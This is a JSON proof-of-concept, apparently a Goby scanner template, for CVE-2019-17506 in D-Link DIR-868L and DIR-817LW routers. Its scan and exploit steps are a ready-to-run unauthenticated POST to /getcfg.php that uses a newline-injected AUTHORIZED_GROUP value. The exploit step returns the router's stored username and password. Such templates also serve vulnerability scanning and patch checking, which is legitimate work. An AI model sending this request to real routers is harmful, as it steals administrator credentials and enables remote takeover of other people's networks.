{ "Name": "D-Link Info Leak CVE-2019-17506", "Level": "3", "Tags": [ "infoleak" ], "GobyQuery": "app=\"D_Link-Router\"", "Description": "D-Link is a global leader in designing and developing networking and connectivity products for consumers, small businesses, medium to large-sized enterprises, and service providers.", "Product": "D-Link", "Homepage": "https://www.dlink.com/", "Author": "", "Impact": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.", "Recommendation": "", "References": [ "https://xz.aliyun.com/t/6453", "https://nvd.nist.gov/vuln/detail/CVE-2019-17506", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/getcfg.php", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "<name>", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "<password>", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/getcfg.php", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }